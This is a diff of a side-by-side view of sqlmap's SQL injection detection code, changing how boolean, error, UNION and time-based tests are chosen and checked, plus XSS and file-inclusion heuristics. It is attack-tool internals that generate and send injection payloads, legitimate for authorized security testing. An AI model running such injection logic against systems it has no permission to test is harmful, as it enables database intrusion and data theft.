msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
|
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
|
||||||
kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []
|
kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []
|
||||||
@@ -153,9 +164,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
# message, via simple heuristic check or via DBMS-specific
|
# message, via simple heuristic check or via DBMS-specific
|
||||||
# payload), ask the user to extend the tests to all DBMS-specific,
|
# payload), ask the user to extend the tests to all DBMS-specific,
|
||||||
# regardless of --level and --risk values provided
|
# regardless of --level and --risk values provided
|
||||||
if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \
|
if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
|
||||||
and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \
|
|
||||||
kb.heuristicDbms or injection.dbms):
|
|
||||||
msg = "for the remaining tests, do you want to include all tests "
|
msg = "for the remaining tests, do you want to include all tests "
|
||||||
msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
|
msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
|
||||||
msg += "level (%d)" % conf.level if conf.level < 5 else ""
|
msg += "level (%d)" % conf.level if conf.level < 5 else ""
|
||||||
@@ -203,7 +212,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
continue
|
continue
|
||||||
|
|
||||||
match = re.search(r"(\d+)-(\d+)", test.request.columns)
|
match = re.search(r"(\d+)-(\d+)", test.request.columns)
|
||||||
if injection.data and match:
|
if match and injection.data:
|
||||||
lower, upper = int(match.group(1)), int(match.group(2))
|
lower, upper = int(match.group(1)), int(match.group(2))
|
||||||
for _ in (lower, upper):
|
for _ in (lower, upper):
|
||||||
if _ > 1:
|
if _ > 1:
|
||||||
@@ -239,9 +248,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
# Skip tests if title, vector or DBMS is not included by the
|
# Skip tests if title, vector or DBMS is not included by the
|
||||||
# given test filter
|
# given test filter
|
||||||
if conf.testFilter and not any(conf.testFilter in str(item) or \
|
if conf.testFilter and not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):
|
||||||
re.search(conf.testFilter, str(item), re.I) for item in \
|
|
||||||
(test.title, test.vector, payloadDbms)):
|
|
||||||
debugMsg = "skipping test '%s' because its " % title
|
debugMsg = "skipping test '%s' because its " % title
|
||||||
debugMsg += "name/vector/DBMS is not included by the given filter"
|
debugMsg += "name/vector/DBMS is not included by the given filter"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
@@ -249,9 +256,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
# Skip tests if title, vector or DBMS is included by the
|
# Skip tests if title, vector or DBMS is included by the
|
||||||
# given skip filter
|
# given skip filter
|
||||||
if conf.testSkip and any(conf.testSkip in str(item) or \
|
if conf.testSkip and any(conf.testSkip in str(item) or re.search(conf.testSkip, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):
|
||||||
re.search(conf.testSkip, str(item), re.I) for item in \
|
|
||||||
(test.title, test.vector, payloadDbms)):
|
|
||||||
debugMsg = "skipping test '%s' because its " % title
|
debugMsg = "skipping test '%s' because its " % title
|
||||||
debugMsg += "name/vector/DBMS is included by the given skip filter"
|
debugMsg += "name/vector/DBMS is included by the given skip filter"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
@@ -333,6 +338,23 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
|
if stype == PAYLOAD.TECHNIQUE.UNION:
|
||||||
|
match = re.search(r"(\d+)-(\d+)", test.request.columns)
|
||||||
|
if match and not injection.data:
|
||||||
|
_ = test.request.columns.split('-')[-1]
|
||||||
|
if conf.uCols is None and _.isdigit() and int(_) > 10:
|
||||||
|
if kb.futileUnion is None:
|
||||||
|
msg = "it is not recommended to perform "
|
||||||
|
msg += "extended UNION tests if there is not "
|
||||||
|
msg += "at least one other (potential) "
|
||||||
|
msg += "technique found. Do you want to skip? [Y/n] "
|
||||||
|
kb.futileUnion = not readInput(msg, default='Y', boolean=True)
|
||||||
|
|
||||||
|
if kb.futileUnion is False:
|
||||||
|
debugMsg = "skipping test '%s'" % title
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
continue
|
||||||
|
|
||||||
infoMsg = "testing '%s'" % title
|
infoMsg = "testing '%s'" % title
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
@@ -342,7 +364,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
# Parse test's <request>
|
# Parse test's <request>
|
||||||
comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
|
comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
|
||||||
fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
|
fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None)
|
||||||
|
|
||||||
for boundary in boundaries:
|
for boundary in boundaries:
|
||||||
injectable = False
|
injectable = False
|
||||||
@@ -404,11 +426,14 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
templatePayload = None
|
templatePayload = None
|
||||||
vector = None
|
vector = None
|
||||||
|
|
||||||
|
origValue = value
|
||||||
|
if kb.customInjectionMark in origValue:
|
||||||
|
origValue = origValue.split(kb.customInjectionMark)[0]
|
||||||
|
origValue = re.search(r"(\w*)\Z", origValue).group(1)
|
||||||
|
|
||||||
# Threat the parameter original value according to the
|
# Threat the parameter original value according to the
|
||||||
# test's <where> tag
|
# test's <where> tag
|
||||||
if where == PAYLOAD.WHERE.ORIGINAL or conf.prefix:
|
if where == PAYLOAD.WHERE.ORIGINAL or conf.prefix:
|
||||||
origValue = value
|
|
||||||
|
|
||||||
if kb.tamperFunctions:
|
if kb.tamperFunctions:
|
||||||
templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
|
templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
|
||||||
elif where == PAYLOAD.WHERE.NEGATIVE:
|
elif where == PAYLOAD.WHERE.NEGATIVE:
|
||||||
@@ -418,7 +443,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
if conf.invalidLogical:
|
if conf.invalidLogical:
|
||||||
_ = int(kb.data.randomInt[:2])
|
_ = int(kb.data.randomInt[:2])
|
||||||
origValue = "%s AND %s=%s" % (value, _, _ + 1)
|
origValue = "%s AND %s LIKE %s" % (origValue, _, _ + 1)
|
||||||
elif conf.invalidBignum:
|
elif conf.invalidBignum:
|
||||||
origValue = kb.data.randomInt[:6]
|
origValue = kb.data.randomInt[:6]
|
||||||
elif conf.invalidString:
|
elif conf.invalidString:
|
||||||
@@ -439,11 +464,13 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
|
boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
|
||||||
boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
|
boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
|
||||||
reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
|
reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
|
||||||
|
|
||||||
if reqPayload:
|
if reqPayload:
|
||||||
if reqPayload in seenPayload:
|
stripPayload = re.sub(r"(\A|\b|_)([A-Za-z]{4}((?<!LIKE))|\d+)(_|\b|\Z)", r"\g<1>.\g<4>", reqPayload)
|
||||||
|
if stripPayload in seenPayload:
|
||||||
continue
|
continue
|
||||||
else:
|
else:
|
||||||
seenPayload.add(reqPayload)
|
seenPayload.add(stripPayload)
|
||||||
else:
|
else:
|
||||||
reqPayload = None
|
reqPayload = None
|
||||||
|
|
||||||
@@ -451,13 +478,13 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
# payload was successful
|
# payload was successful
|
||||||
# Parse test's <response>
|
# Parse test's <response>
|
||||||
for method, check in test.response.items():
|
for method, check in test.response.items():
|
||||||
check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
|
check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None)
|
||||||
|
|
||||||
# In case of boolean-based blind SQL injection
|
# In case of boolean-based blind SQL injection
|
||||||
if method == PAYLOAD.METHOD.COMPARISON:
|
if method == PAYLOAD.METHOD.COMPARISON:
|
||||||
# Generate payload used for comparison
|
# Generate payload used for comparison
|
||||||
def genCmpPayload():
|
def genCmpPayload():
|
||||||
sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
|
sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None)
|
||||||
|
|
||||||
# Forge response payload by prepending with
|
# Forge response payload by prepending with
|
||||||
# boundary's prefix and appending the boundary's
|
# boundary's prefix and appending the boundary's
|
||||||
@@ -495,12 +522,16 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
errorResult = Request.queryPage(errorPayload, place, raise404=False)
|
errorResult = Request.queryPage(errorPayload, place, raise404=False)
|
||||||
if errorResult:
|
if errorResult:
|
||||||
continue
|
continue
|
||||||
elif not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
|
elif kb.heuristicPage and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
|
||||||
_ = comparison(kb.heuristicPage, None, getRatioValue=True)
|
_ = comparison(kb.heuristicPage, None, getRatioValue=True)
|
||||||
if _ > kb.matchRatio:
|
if _ > kb.matchRatio:
|
||||||
kb.matchRatio = _
|
kb.matchRatio = _
|
||||||
logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio)
|
logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio)
|
||||||
|
|
||||||
|
# Reducing false-positive "appears" messages in heavily dynamic environment
|
||||||
|
if kb.heavilyDynamic and not Request.queryPage(reqPayload, place, raise404=False):
|
||||||
|
continue
|
||||||
|
|
||||||
injectable = True
|
injectable = True
|
||||||
|
|
||||||
elif threadData.lastComparisonRatio > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
|
elif threadData.lastComparisonRatio > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
|
||||||
@@ -508,8 +539,13 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
trueSet = set(getFilteredPageContent(truePage, True, "\n").split("\n"))
|
trueSet = set(getFilteredPageContent(truePage, True, "\n").split("\n"))
|
||||||
falseSet = set(getFilteredPageContent(falsePage, True, "\n").split("\n"))
|
falseSet = set(getFilteredPageContent(falsePage, True, "\n").split("\n"))
|
||||||
|
|
||||||
|
if threadData.lastErrorPage and threadData.lastErrorPage[1]:
|
||||||
|
errorSet = set(getFilteredPageContent(threadData.lastErrorPage[1], True, "\n").split("\n"))
|
||||||
|
else:
|
||||||
|
errorSet = set()
|
||||||
|
|
||||||
if originalSet == trueSet != falseSet:
|
if originalSet == trueSet != falseSet:
|
||||||
candidates = trueSet - falseSet
|
candidates = trueSet - falseSet - errorSet
|
||||||
|
|
||||||
if candidates:
|
if candidates:
|
||||||
candidates = sorted(candidates, key=lambda _: len(_))
|
candidates = sorted(candidates, key=lambda _: len(_))
|
||||||
@@ -532,12 +568,18 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
else:
|
else:
|
||||||
trueSet = set(extractTextTagContent(trueRawResponse))
|
trueSet = set(extractTextTagContent(trueRawResponse))
|
||||||
trueSet = trueSet.union(__ for _ in trueSet for __ in _.split())
|
trueSet |= set(__ for _ in trueSet for __ in _.split())
|
||||||
|
|
||||||
falseSet = set(extractTextTagContent(falseRawResponse))
|
falseSet = set(extractTextTagContent(falseRawResponse))
|
||||||
falseSet = falseSet.union(__ for _ in falseSet for __ in _.split())
|
falseSet |= set(__ for _ in falseSet for __ in _.split())
|
||||||
|
|
||||||
candidates = filter(None, (_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet)))
|
if threadData.lastErrorPage and threadData.lastErrorPage[1]:
|
||||||
|
errorSet = set(extractTextTagContent(threadData.lastErrorPage[1]))
|
||||||
|
errorSet |= set(__ for _ in errorSet for __ in _.split())
|
||||||
|
else:
|
||||||
|
errorSet = set()
|
||||||
|
|
||||||
|
candidates = filter(None, (_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet - errorSet)))
|
||||||
|
|
||||||
if candidates:
|
if candidates:
|
||||||
candidates = sorted(candidates, key=lambda _: len(_))
|
candidates = sorted(candidates, key=lambda _: len(_))
|
||||||
@@ -574,10 +616,10 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
# body for the test's <grep> regular expression
|
# body for the test's <grep> regular expression
|
||||||
try:
|
try:
|
||||||
page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
|
page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
|
||||||
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
|
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE)
|
||||||
or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) \
|
output = output or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE)
|
||||||
or extractRegexResult(check, listToStrValue((headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE) \
|
output = output or extractRegexResult(check, listToStrValue((headers[key] for key in headers if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE)
|
||||||
or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
|
output = output or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
|
||||||
|
|
||||||
if output:
|
if output:
|
||||||
result = output == "1"
|
result = output == "1"
|
||||||
@@ -588,10 +630,10 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
injectable = True
|
injectable = True
|
||||||
|
|
||||||
except SqlmapConnectionException, msg:
|
except SqlmapConnectionException as ex:
|
||||||
debugMsg = "problem occurred most likely because the "
|
debugMsg = "problem occurred most likely because the "
|
||||||
debugMsg += "server hasn't recovered as expected from the "
|
debugMsg += "server hasn't recovered as expected from the "
|
||||||
debugMsg += "error-based payload used ('%s')" % msg
|
debugMsg += "error-based payload used ('%s')" % getSafeExString(ex)
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
# In case of time-based blind or stacked queries
|
# In case of time-based blind or stacked queries
|
||||||
@@ -646,18 +688,6 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
infoMsg += "there is at least one other (potential) "
|
infoMsg += "there is at least one other (potential) "
|
||||||
infoMsg += "technique found"
|
infoMsg += "technique found"
|
||||||
singleTimeLogMessage(infoMsg)
|
singleTimeLogMessage(infoMsg)
|
||||||
elif not injection.data:
|
|
||||||
_ = test.request.columns.split('-')[-1]
|
|
||||||
if _.isdigit() and int(_) > 10:
|
|
||||||
if kb.futileUnion is None:
|
|
||||||
msg = "it is not recommended to perform "
|
|
||||||
msg += "extended UNION tests if there is not "
|
|
||||||
msg += "at least one other (potential) "
|
|
||||||
msg += "technique found. Do you want to skip? [Y/n] "
|
|
||||||
|
|
||||||
kb.futileUnion = not readInput(msg, default='Y', boolean=True)
|
|
||||||
if kb.futileUnion is False:
|
|
||||||
continue
|
|
||||||
|
|
||||||
# Test for UNION query SQL injection
|
# Test for UNION query SQL injection
|
||||||
reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
|
reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
|
||||||
@@ -674,7 +704,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
kb.previousMethod = method
|
kb.previousMethod = method
|
||||||
|
|
||||||
if conf.dummy or conf.offline:
|
if conf.offline:
|
||||||
injectable = False
|
injectable = False
|
||||||
|
|
||||||
# If the injection test was successful feed the injection
|
# If the injection test was successful feed the injection
|
||||||
@@ -741,7 +771,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
|
infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
process = subprocess.Popen(conf.alert, shell=True)
|
process = subprocess.Popen(conf.alert.encode(sys.getfilesystemencoding() or UNICODE_ENCODING), shell=True)
|
||||||
process.wait()
|
process.wait()
|
||||||
|
|
||||||
kb.alerted = True
|
kb.alerted = True
|
||||||
@@ -763,7 +793,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
if conf.multipleTargets:
|
if conf.multipleTargets:
|
||||||
msg = "how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
msg = "how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
||||||
choice = readInput(msg, default='T', checkBatch=False).upper()
|
choice = readInput(msg, default='X', checkBatch=False).upper()
|
||||||
else:
|
else:
|
||||||
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
||||||
choice = readInput(msg, default='S', checkBatch=False).upper()
|
choice = readInput(msg, default='S', checkBatch=False).upper()
|
||||||
@@ -816,6 +846,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
return injection
|
return injection
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def heuristicCheckDbms(injection):
|
def heuristicCheckDbms(injection):
|
||||||
"""
|
"""
|
||||||
This functions is called when boolean-based blind is identified with a
|
This functions is called when boolean-based blind is identified with a
|
||||||
@@ -835,8 +866,8 @@ def heuristicCheckDbms(injection):
|
|||||||
if conf.noEscape and dbms not in FROM_DUMMY_TABLE:
|
if conf.noEscape and dbms not in FROM_DUMMY_TABLE:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)):
|
if checkBooleanExpression("(SELECT '%s'%s)=%s%s%s" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), SINGLE_QUOTE_MARKER, randStr1, SINGLE_QUOTE_MARKER)):
|
||||||
if not checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr2)):
|
if not checkBooleanExpression("(SELECT '%s'%s)=%s%s%s" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), SINGLE_QUOTE_MARKER, randStr2, SINGLE_QUOTE_MARKER)):
|
||||||
retVal = dbms
|
retVal = dbms
|
||||||
break
|
break
|
||||||
|
|
||||||
@@ -852,6 +883,7 @@ def heuristicCheckDbms(injection):
|
|||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def checkFalsePositives(injection):
|
def checkFalsePositives(injection):
|
||||||
"""
|
"""
|
||||||
Checks for false positives (only in single special cases)
|
Checks for false positives (only in single special cases)
|
||||||
@@ -859,8 +891,7 @@ def checkFalsePositives(injection):
|
|||||||
|
|
||||||
retVal = True
|
retVal = True
|
||||||
|
|
||||||
if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\
|
if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
|
||||||
(len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
|
|
||||||
pushValue(kb.injection)
|
pushValue(kb.injection)
|
||||||
|
|
||||||
infoMsg = "checking if the injection point on %s " % injection.place
|
infoMsg = "checking if the injection point on %s " % injection.place
|
||||||
@@ -872,7 +903,7 @@ def checkFalsePositives(injection):
|
|||||||
|
|
||||||
kb.injection = injection
|
kb.injection = injection
|
||||||
|
|
||||||
for i in xrange(conf.level):
|
for level in xrange(conf.level):
|
||||||
while True:
|
while True:
|
||||||
randInt1, randInt2, randInt3 = (_() for j in xrange(3))
|
randInt1, randInt2, randInt3 = (_() for j in xrange(3))
|
||||||
|
|
||||||
@@ -914,6 +945,7 @@ def checkFalsePositives(injection):
|
|||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def checkSuhosinPatch(injection):
|
def checkSuhosinPatch(injection):
|
||||||
"""
|
"""
|
||||||
Checks for existence of Suhosin-patch (and alike) protection mechanism(s)
|
Checks for existence of Suhosin-patch (and alike) protection mechanism(s)
|
||||||
@@ -921,7 +953,7 @@ def checkSuhosinPatch(injection):
|
|||||||
|
|
||||||
if injection.place == PLACE.GET:
|
if injection.place == PLACE.GET:
|
||||||
debugMsg = "checking for parameter length "
|
debugMsg = "checking for parameter length "
|
||||||
debugMsg += "constrainting mechanisms"
|
debugMsg += "constraining mechanisms"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
pushValue(kb.injection)
|
pushValue(kb.injection)
|
||||||
@@ -930,13 +962,14 @@ def checkSuhosinPatch(injection):
|
|||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
|
|
||||||
if not checkBooleanExpression("%d=%s%d" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)):
|
if not checkBooleanExpression("%d=%s%d" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)):
|
||||||
warnMsg = "parameter length constrainting "
|
warnMsg = "parameter length constraining "
|
||||||
warnMsg += "mechanism detected (e.g. Suhosin patch). "
|
warnMsg += "mechanism detected (e.g. Suhosin patch). "
|
||||||
warnMsg += "Potential problems in enumeration phase can be expected"
|
warnMsg += "Potential problems in enumeration phase can be expected"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
kb.injection = popValue()
|
kb.injection = popValue()
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def checkFilteredChars(injection):
|
def checkFilteredChars(injection):
|
||||||
debugMsg = "checking for filtered characters"
|
debugMsg = "checking for filtered characters"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
@@ -957,7 +990,7 @@ def checkFilteredChars(injection):
|
|||||||
|
|
||||||
# inference techniques depend on character '>'
|
# inference techniques depend on character '>'
|
||||||
if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
|
if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
|
||||||
if not checkBooleanExpression("%d>%d" % (randInt+1, randInt)):
|
if not checkBooleanExpression("%d>%d" % (randInt + 1, randInt)):
|
||||||
warnMsg = "it appears that the character '>' is "
|
warnMsg = "it appears that the character '>' is "
|
||||||
warnMsg += "filtered by the back-end server. You are strongly "
|
warnMsg += "filtered by the back-end server. You are strongly "
|
||||||
warnMsg += "advised to rerun with the '--tamper=between'"
|
warnMsg += "advised to rerun with the '--tamper=between'"
|
||||||
@@ -966,8 +999,8 @@ def checkFilteredChars(injection):
|
|||||||
kb.injection = popValue()
|
kb.injection = popValue()
|
||||||
|
|
||||||
def heuristicCheckSqlInjection(place, parameter):
|
def heuristicCheckSqlInjection(place, parameter):
|
||||||
if kb.nullConnection:
|
if kb.heavilyDynamic:
|
||||||
debugMsg = "heuristic check skipped because NULL connection used"
|
debugMsg = "heuristic check skipped because of heavy dynamicity"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
return None
|
return None
|
||||||
|
|
||||||
@@ -1023,9 +1056,19 @@ def heuristicCheckSqlInjection(place, parameter):
|
|||||||
kb.heuristicTest = HEURISTIC_TEST.CASTED if casting else HEURISTIC_TEST.NEGATIVE if not result else HEURISTIC_TEST.POSITIVE
|
kb.heuristicTest = HEURISTIC_TEST.CASTED if casting else HEURISTIC_TEST.NEGATIVE if not result else HEURISTIC_TEST.POSITIVE
|
||||||
|
|
||||||
if casting:
|
if casting:
|
||||||
errMsg = "possible %s casting " % ("integer" if origValue.isdigit() else "type")
|
errMsg = "possible %s casting detected (e.g. '" % ("integer" if origValue.isdigit() else "type")
|
||||||
errMsg += "detected (e.g. \"$%s=intval($_REQUEST['%s'])\") " % (parameter, parameter)
|
|
||||||
errMsg += "at the back-end web application"
|
platform = conf.url.split('.')[-1].lower()
|
||||||
|
if platform == WEB_PLATFORM.ASP:
|
||||||
|
errMsg += "%s=CInt(request.querystring(\"%s\"))" % (parameter, parameter)
|
||||||
|
elif platform == WEB_PLATFORM.ASPX:
|
||||||
|
errMsg += "int.TryParse(Request.QueryString[\"%s\"], out %s)" % (parameter, parameter)
|
||||||
|
elif platform == WEB_PLATFORM.JSP:
|
||||||
|
errMsg += "%s=Integer.parseInt(request.getParameter(\"%s\"))" % (parameter, parameter)
|
||||||
|
else:
|
||||||
|
errMsg += "$%s=intval($_REQUEST[\"%s\"])" % (parameter, parameter)
|
||||||
|
|
||||||
|
errMsg += "') at the back-end web application"
|
||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
|
|
||||||
if kb.ignoreCasted is None:
|
if kb.ignoreCasted is None:
|
||||||
@@ -1054,13 +1097,13 @@ def heuristicCheckSqlInjection(place, parameter):
|
|||||||
|
|
||||||
if value.lower() in (page or "").lower():
|
if value.lower() in (page or "").lower():
|
||||||
infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
|
infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
|
||||||
infoMsg += "'%s' might be vulnerable to cross-site scripting attacks" % parameter
|
infoMsg += "'%s' might be vulnerable to cross-site scripting (XSS) attacks" % parameter
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
for match in re.finditer(FI_ERROR_REGEX, page or ""):
|
for match in re.finditer(FI_ERROR_REGEX, page or ""):
|
||||||
if randStr1.lower() in match.group(0).lower():
|
if randStr1.lower() in match.group(0).lower():
|
||||||
infoMsg = "heuristic (FI) test shows that %s parameter " % paramType
|
infoMsg = "heuristic (FI) test shows that %s parameter " % paramType
|
||||||
infoMsg += "'%s' might be vulnerable to file inclusion attacks" % parameter
|
infoMsg += "'%s' might be vulnerable to file inclusion (FI) attacks" % parameter
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
break
|
break
|
||||||
|
|
||||||
@@ -1090,14 +1133,6 @@ def checkDynParam(place, parameter, value):
|
|||||||
try:
|
try:
|
||||||
payload = agent.payload(place, parameter, value, getUnicode(randInt))
|
payload = agent.payload(place, parameter, value, getUnicode(randInt))
|
||||||
dynResult = Request.queryPage(payload, place, raise404=False)
|
dynResult = Request.queryPage(payload, place, raise404=False)
|
||||||
|
|
||||||
if not dynResult:
|
|
||||||
infoMsg = "confirming that %s parameter '%s' is dynamic" % (paramType, parameter)
|
|
||||||
logger.info(infoMsg)
|
|
||||||
|
|
||||||
randInt = randomInt()
|
|
||||||
payload = agent.payload(place, parameter, value, getUnicode(randInt))
|
|
||||||
dynResult = Request.queryPage(payload, place, raise404=False)
|
|
||||||
except SqlmapConnectionException:
|
except SqlmapConnectionException:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
@@ -1157,6 +1192,8 @@ def checkDynamicContent(firstPage, secondPage):
|
|||||||
warnMsg += "sqlmap is going to retry the request(s)"
|
warnMsg += "sqlmap is going to retry the request(s)"
|
||||||
